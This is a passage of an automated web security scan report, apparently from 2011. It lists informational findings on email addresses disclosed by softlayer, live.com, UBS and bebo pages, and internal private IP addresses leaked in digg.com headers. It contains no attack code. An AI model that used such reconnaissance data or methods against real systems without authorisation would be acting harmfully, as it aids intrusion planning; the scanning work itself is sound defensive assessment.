<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
<a href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
<a href="mailto:support@softlayer.com">support@softlayer.com</a>
...[SNIP]...

18.15. https://manage.softlayer.com/index/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://manage.softlayer.com
Path:   /index/index

Issue detail

The following email addresses were disclosed in the response:

Request

GET /index/index HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:45 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
<a href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
<a href="mailto:support@softlayer.com">support@softlayer.com</a>
...[SNIP]...

18.16. https://msnia.login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://msnia.login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following email address was disclosed in the response:

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12632
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3040ca2c-de70-4a63-9d3d-1c68eed3a3d2; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: TK2IDSMLGN1A10 V: 0
Date: Wed, 06 Jul 2011 11:21:32 GMT
Connection: close

<!-- ServerInfo: TK2IDSMLGN1A10 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountr
...[SNIP]...
~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!IN~India~91~^[1-9]{1}[0-9]{9}$~81234-56789~-=5!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!JO~Jordan~962~^[1-9]{1}[0-9]{8}$~7 7123 4567~=1, =5!!!KR~Korea~82~^[1-9]{1}[0-9]{8,9}$~10 1234 5678~=2, =6!!!KW~Kuwait~965~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!MY~Malaysia~60~^[1-9]{1}[0-9]{8}$~1-4234
...[SNIP]...

18.17. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dna

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/ex/pbl/ubso/dna

Issue detail

The following email address was disclosed in the response:

Request

GET /olsauth/ex/pbl/ubso/dna HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:07:58 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
pragma: no-cache
cache-control: no-store
expires: Thu, 01 Jan 1970 00:00:00 GMT


<html>
   
   <HEAD>    
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>Online Services</title>
   </HEAD>

   <BODY leftmargin="0" topmargin="0" marginwidth
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.18. https://onlineservices.ubs.com/olsauth/public/SE/OLS/_security.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/public/SE/OLS/_security.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /olsauth/public/SE/OLS/_security.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:10 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>    
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>UBS Financial Services Security Statement</title>
   </head>

   <body leftma
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.19. https://onlineservices.ubs.com/olsauth/public/SE/OLS/customerPrivacy37.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/public/SE/OLS/customerPrivacy37.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /olsauth/public/SE/OLS/customerPrivacy37.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:09 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
<HEAD>
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   
</HEAD>


<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" link="
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.20. https://onlineservices.ubs.com/olsauth/public/SE/OLS/importantLegalInformation.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/public/SE/OLS/importantLegalInformation.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /olsauth/public/SE/OLS/importantLegalInformation.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:11 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>    
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>Online Services</title>
   </HEAD>

   <BODY leftmargin="0" topmargin="0" marginwid
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.21. https://onlineservices.ubs.com/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:12 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>    
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>Online Services</title>
   </HEAD>

   <BODY leftmargin="0" topmargin="0" marginwid
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.22. https://onlineservices.ubs.com/olsauth/public/SE/OLS/onlinePrivacy37.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/public/SE/OLS/onlinePrivacy37.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /olsauth/public/SE/OLS/onlinePrivacy37.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:09 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>    
   <HEAD>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       
   </HEAD>

   <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" lin
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.23. https://onlineservices.ubs.com/olsauth/public/SE/OLS/privacyStatement37.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/public/SE/OLS/privacyStatement37.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /olsauth/public/SE/OLS/privacyStatement37.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:12 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">        
       
   </HEAD>

   <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.24. https://onlineservices.ubs.com/olsauth/public/SE/OLS/security.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /olsauth/public/SE/OLS/security.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /olsauth/public/SE/OLS/security.jsp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:07 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"


<html>
   
   <HEAD>    
   <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>UBS Financial Services Security Statement</title>
   </head>

   <body leftma
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.25. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /staticfiles/olspages/documents/viewPrint.html

Issue detail

The following email address was disclosed in the response:

Request

GET /staticfiles/olspages/documents/viewPrint.html HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
accept-ranges: bytes
connection: close
content-type: text/html
date: Wed, 06 Jul 2011 14:08:13 GMT
etag: "8001-4dfa7d49"
last-modified: Thu, 16 Jun 2011 22:01:45 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 32769

<html>    
   <HEAD>    
   <LINK href="https://onlineservices.ubs.com/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>Online Services</title>
   <SCRIPT language=javascript
...[SNIP]...
<a href='mailto:onlineservices@ubs.com'>onlineservices@ubs.com</a>
...[SNIP]...

18.26. http://s.bebo.com/js/mootools-core-and-more-1.3.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /js/mootools-core-and-more-1.3.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/mootools-core-and-more-1.3.js?fp=2cf4af889cfa23415c41c8725abb6b9a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
ETag: "ANQNXRn5n1o"
Last-Modified: Mon, 07 Feb 2011 18:15:43 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 316167
Date: Wed, 06 Jul 2011 11:21:59 GMT
Connection: close
Cache-Control: max-age=315360000

/*
---
MooTools: the javascript framework

web build:
- http://mootools.net/core/7c56cfef9dddcf170a5d68e3fb61cfd7

packager build:
- packager build Core/Core Core/Array Core/String Core/Number Core/
...[SNIP]...
lowed.",dateSuchAs:"Please enter a valid date such as {date}",dateInFormatMDY:'Please enter a valid date such as MM/DD/YYYY (i.e. "12/31/1999")',email:'Please enter a valid email address. For example "fred@domain.com".',url:"Please enter a valid URL such as http://www.google.com.",currencyDollar:"Please enter a valid $ amount. For example $100.00 .",oneRequired:"Please enter something for at least one of these inp
...[SNIP]...
na data valida com {date}",dateInFormatMDY:'Per favor introdueix una data valida com DD/MM/YYYY (p.e. "31/12/1999")',email:'Per favor, introdueix una adre..a de correu electronic valida. Per exemple, "fred@domain.com".',url:"Per favor introdueix una URL valida com http://www.google.com.",currencyDollar:"Per favor introdueix una quantitat valida de .... Per exemple ...100,00 .",oneRequired:"Per favor introdueix alg
...[SNIP]...
SuchAs:"Zadejte pros..m platn.. datum jako {date}",dateInFormatMDY:'Zadejte pros..m platn.. datum jako MM / DD / RRRR (tj. "12/31/1999")',email:'Zadejte pros..m platnou e-mailovou adresu. Nap....klad "fred@domain.com".',url:"Zadejte pros..m platnou URL adresu jako http://www.google.com.",currencyDollar:"Zadejte pros..m platnou ....stku. Nap....klad $100.00.",oneRequired:"Zadejte pros..m alespo.. jednu hodnotu pro
...[SNIP]...
mrum og andre tegn er ikke tilladt.",dateSuchAs:"Skriv en gyldig dato som {date}",dateInFormatMDY:'Skriv dato i formatet DD-MM-YYYY (f.eks. "31-12-1999")',email:'Skriv en gyldig e-mail adresse. F.eks "fred@domain.com".',url:'Skriv en gyldig URL adresse. F.eks "http://www.google.com".',currencyDollar:"Skriv et gldigt bel..b. F.eks Kr.100.00 .",oneRequired:"Et eller flere af felterne i denne formular skal udfyldes."
...[SNIP]...
InFormatMDY:"Geben Sie bitte ein g&uuml;ltiges Datum ein. Wie zum Beispiel TT.MM.JJJJ (z.B. &quot;31.12.1999&quot;)",email:"Geben Sie bitte eine g&uuml;ltige E-Mail Adresse ein. Wie zum Beispiel &quot;maria@bernasconi.ch&quot;.",url:"Geben Sie bitte eine g&uuml;ltige URL ein. Wie zum Beispiel http://www.google.ch.",currencyDollar:"Geben Sie bitte einen g&uuml;ltigen Betrag in Schweizer Franken ein. Wie zum Beispiel 10
...[SNIP]...
date}&quot;).",dateInFormatMDY:"Geben Sie bitte ein g&uuml;ltiges Datum im Format TT.MM.JJJJ ein (z.B. &quot;31.12.1999&quot;).",email:"Geben Sie bitte eine g&uuml;ltige E-Mail-Adresse ein (z.B. &quot;max@mustermann.de&quot;).",url:"Geben Sie bitte eine g&uuml;ltige URL ein (z.B. &quot;http://www.google.de&quot;).",currencyDollar:"Geben Sie bitte einen g&uuml;ltigen Betrag in EURO ein (z.B. 100.00&#8364;).",oneRequi
...[SNIP]...
.lida como {date}",dateInFormatMDY:'Por favor ingrese una fecha v..lida, utulizando el formato DD/MM/YYYY (p.e. "31/12/1999")',email:'Por favor, ingrese una direcci..n de e-mail v..lida. Por ejemplo, "fred@dominio.com".',url:"Por favor ingrese una URL v..lida como http://www.google.com.",currencyDollar:"Por favor ingrese una cantidad v..lida de pesos. Por ejemplo $100,00 .",oneRequired:"Por favor ingrese algo para
...[SNIP]...
da como {date}",dateInFormatMDY:'Por favor introduce una fecha v&aacute;lida como DD/MM/YYYY (p.e. "31/12/1999")',email:'Por favor, introduce una direcci&oacute;n de email v&aacute;lida. Por ejemplo, "fred@domain.com".',url:"Por favor introduce una URL v&aacute;lida como http://www.google.com.",currencyDollar:"Por favor introduce una cantidad v&aacute;lida de .... Por ejemplo ...100,00 .",oneRequired:"Por favor in
...[SNIP]...
As:"Palun sisestage kehtiv kuup..ev kujul {date}",dateInFormatMDY:'Palun sisestage kehtiv kuup..ev kujul MM.DD.YYYY (n..iteks: "12.31.1999").',email:'Palun sisestage kehtiv e-maili aadress (n..iteks: "fred@domain.com").',url:"Palun sisestage kehtiv URL (n..iteks: http://www.google.com).",currencyDollar:"Palun sisestage kehtiv $ summa (n..iteks: $100.00).",oneRequired:"Palun sisestage midagi v..hemalt ..hele antud
...[SNIP]...
tMDY:'........ .... .......... .......... .... ...... MM/DD/YYYY ........ ........ (.......... "12/31/1999").',email:'........ .... ........ .......... .......... ........ ......... ........ ........ "fred@domain.com".',url:"........ .... URL .......... .......... http://www.google.com ........ .........",currencyDollar:"........ .... ............ .......... ........ ...... ...... ........ ........ .......... 100.
...[SNIP]...
esimerkiksi {date}",dateInFormatMDY:'Ole hyv.. ja anna kelvollinen p..iv..m....r.. muodossa pp/kk/vvvv (kuten "12/31/1999")',email:'Ole hyv.. ja anna kelvollinen s..hk..postiosoite (kuten esimerkiksi "matti@meikalainen.com").',url:"Ole hyv.. ja anna kelvollinen URL, kuten esimerkiksi http://www.google.fi.",currencyDollar:"Ole hyv.. ja anna kelvollinen eurosumma (kuten esimerkiksi 100,00 EUR) .",oneRequired:"Ole hyv.. ja
...[SNIP]...
e correcte comme {date}",dateInFormatMDY:'Veuillez saisir une date correcte, au format JJ/MM/AAAA (ex : "31/11/1999").',email:'Veuillez saisir une adresse de courrier &eacute;lectronique. Par example "fred@domaine.com".',url:"Veuillez saisir une URL, comme http://www.google.com.",currencyDollar:"Veuillez saisir une quantit&eacute; correcte. Par example 100,00&euro;.",oneRequired:"Veuillez s&eacute;lectionner au moi
...[SNIP]...
. ........, ...... {date}",dateInFormatMDY:'.... .......... .......... ........ ............ MM/DD/YYYY (...... "12/31/1999")',email:'.... .......... .......... ............ ........... ............: "fred@domain.com".',url:".... .......... .......... ...... .........., ...... http://www.google.com.",currencyDollar:".... .......... ........ .......... ......... ............ $100.00.",oneRequired:".... .......... .
...[SNIP]...
s d..tum megad..sa sz..ks..ges (pl. {date}).",dateInFormatMDY:'Val..s d..tum megad..sa sz..ks..ges .........HH.NN. form..ban. (pl. "1999.12.31.")',email:'Val..s e-mail c..m megad..sa sz..ks..ges (pl. "fred@domain.hu").',url:"Val..s URL megad..sa sz..ks..ges (pl. http://www.google.com).",currencyDollar:"Val..s p..nz..sszeg megad..sa sz..ks..ges (pl. 100.00 Ft.).",oneRequired:"Az al..bbi mez..k legal..bb egyik..nek
...[SNIP]...
ri.",dateSuchAs:"Inserire una data valida del tipo {date}",dateInFormatMDY:'Inserire una data valida nel formato MM/GG/AAAA (es.: "12/31/1999")',email:'Inserire un indirizzo email valido. Per esempio "nome@dominio.com".',url:'Inserire un indirizzo valido. Per esempio "http://www.dominio.com".',currencyDollar:'Inserire un importo valido. Per esempio "$100.00".',oneRequired:"Completare almeno uno dei campi richiesti.
...[SNIP]...
",dateSuchAs:"Vul een geldige datum in, zoals {date}",dateInFormatMDY:'Vul een geldige datum, in het formaat MM/DD/YYYY (bijvoorbeeld "12/31/1999")',email:'Vul een geldig e-mailadres in. Bijvoorbeeld "fred@domein.nl".',url:"Vul een geldige URL in, zoals http://www.google.nl.",currencyDollar:"Vul een geldig $ bedrag in. Bijvoorbeeld $100.00 .",oneRequired:"Vul iets in bij in ieder geval een van deze velden.",warni
...[SNIP]...
nn en gyldig dato, som {date}",dateInFormatMDY:'Vennligst skriv inn en gyldig dato, i formatet MM/DD/YYYY (for eksempel "12/31/1999")',email:'Vennligst skriv inn en gyldig epost-adresse. For eksempel "espen@domene.no".',url:"Vennligst skriv inn en gyldig URL, for eksempel http://www.google.no.",currencyDollar:"Vennligst fyll ut et gyldig $ bel....p. For eksempel $100.00 .",oneRequired:"Vennligst fyll ut noe i mins
...[SNIP]...
As:"Prosimy poda.. prawid..ow.. dat.. w formacie: {date}",dateInFormatMDY:'Prosimy poda.. poprawn.. date w formacie DD.MM.RRRR (i.e. "12.01.2009")',email:'Prosimy poda.. prawid..owy adres e-mail, np. "jan@domena.pl".',url:"Prosimy poda.. prawid..owy adres URL, np. http://www.google.pl.",currencyDollar:"Prosimy poda.. prawid..ow.. sum.. w PLN. Dla przyk..adu: 100.00 PLN.",oneRequired:"Prosimy wype..ni.. chocia..
...[SNIP]...
dos.",dateSuchAs:"Digite uma data v..lida, como {date}",dateInFormatMDY:'Digite uma data v..lida, como DD/MM/YYYY (por exemplo, "31/12/1999")',email:'Digite um endere..o de email v..lido. Por exemplo "nome@dominio.com".',url:"Digite uma URL v..lida. Exemplo: http://www.google.com.",currencyDollar:"Digite um valor em dinheiro v..lido. Exemplo: R$100,00 .",oneRequired:"Digite algo para pelo menos um desses campos.",e
...[SNIP]...
permitidos.",dateSuchAs:"Digite uma data v..lida, como {date}",dateInFormatMDY:'Digite uma data v..lida, como DD/MM/YYYY (p.ex. "31/12/1999")',email:'Digite um endere..o de email v..lido. Por exemplo "fred@domain.com".',url:"Digite uma URL v..lida, como http://www.google.com.",currencyDollar:"Digite um valor v..lido $. Por exemplo $ 100,00. ",oneRequired:"Digite algo para pelo menos um desses insumos.",errorPrefix
...[SNIP]...
.......... ........ .. .............. ..../..../........ (................ "12/31/1999")',email:'...................., .............. .................... ..........-........... ...... .............. "fred@domain.com".',url:"...................., .............. .................... ............ ........ http://www.google.com.",currencyDollar:"...................., .............. .......... .. ................. ...
...[SNIP]...
.",dateSuchAs:"Prosim, vnesite pravilen datum kot {date}",dateInFormatMDY:'Prosim, vnesite pravilen datum kot MM.DD.YYYY (primer "12.31.1999")',email:'Prosim, vnesite pravilen email naslov. Na primer "fred@domain.com".',url:"Prosim, vnesite pravilen URL kot http://www.google.com.",currencyDollar:"Prosim, vnesit epravilno vrednost .... Primer 100,00... .",oneRequired:"Prosimo, vnesite nekaj za vsaj eno izmed teh po
...[SNIP]...
..r till..tna.",dateSuchAs:"Ange ett giltigt datum som t.ex. {date}",dateInFormatMDY:'Ange ett giltigt datum som t.ex. YYYY-MM-DD (i.e. "1999-12-31")',email:'Ange en giltig e-postadress. Till exempel "erik@domain.com".',url:"Ange en giltig webbadress som http://www.google.com.",currencyDollar:"Ange en giltig belopp. Exempelvis 100,00.",oneRequired:"V..nligen ange minst ett av dessa alternativ.",errorPrefix:"Fel: "
...[SNIP]...
........... ........ .. .............. ..../..../........ (.................. "12/31/2009").',email:'.............. ................ ............ ...................... .......... (.................. "name@domain.com").',url:".............. ................ ................-.................. (.................. http://www.google.com).",currencyDollar:'.............. ........ .. .............. (..................
...[SNIP]...
chAs:".......................................{date}...",dateInFormatMDY:'..........................................YYYY-MM-DD ("2010-12-31")...',email:'................................................"fred@domain.com"...',url:".................. Url ..................http://www.google.com...",currencyDollar:".............................................100.0",oneRequired:"........................",errorPrefix:"...
...[SNIP]...
As:".......................................{date}... ",dateInFormatMDY:'..........................................YYYY-MM-DD ("2010-12-31")... ',email:'................................................"fred@domain.com"... ',url:"..................Url ..................http://www.google.com... ",currencyDollar:".............................................100.0",oneRequired:"........................ ",errorPrefix:".
...[SNIP]...

19. Private IP addresses disclosed
There are 11 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


19.1. http://digg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=be4697b47d58b1200ef3f6956c8cc49e2813419339d6fd7bb526092b66b1dc13; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=237528 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 101255

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- The Latest News Headlines, Videos and Images
</title>

<met
...[SNIP]...
<span title="10.2.129.225 Build: 236 - Thu Jun 23 13:57:54 PDT 2011">
...[SNIP]...

19.2. http://digg.com/ajax/submit/crawl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/submit/crawl

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/submit/crawl HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=17783 10.2.129.90
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/json
Content-Length: 57

{"event":"digg:error","data":{"message":"Missing Token"}}

19.3. http://digg.com/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24276 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8609

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...

19.4. http://digg.com/register

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=38879 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10144

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...

19.5. http://digg.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=27180 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
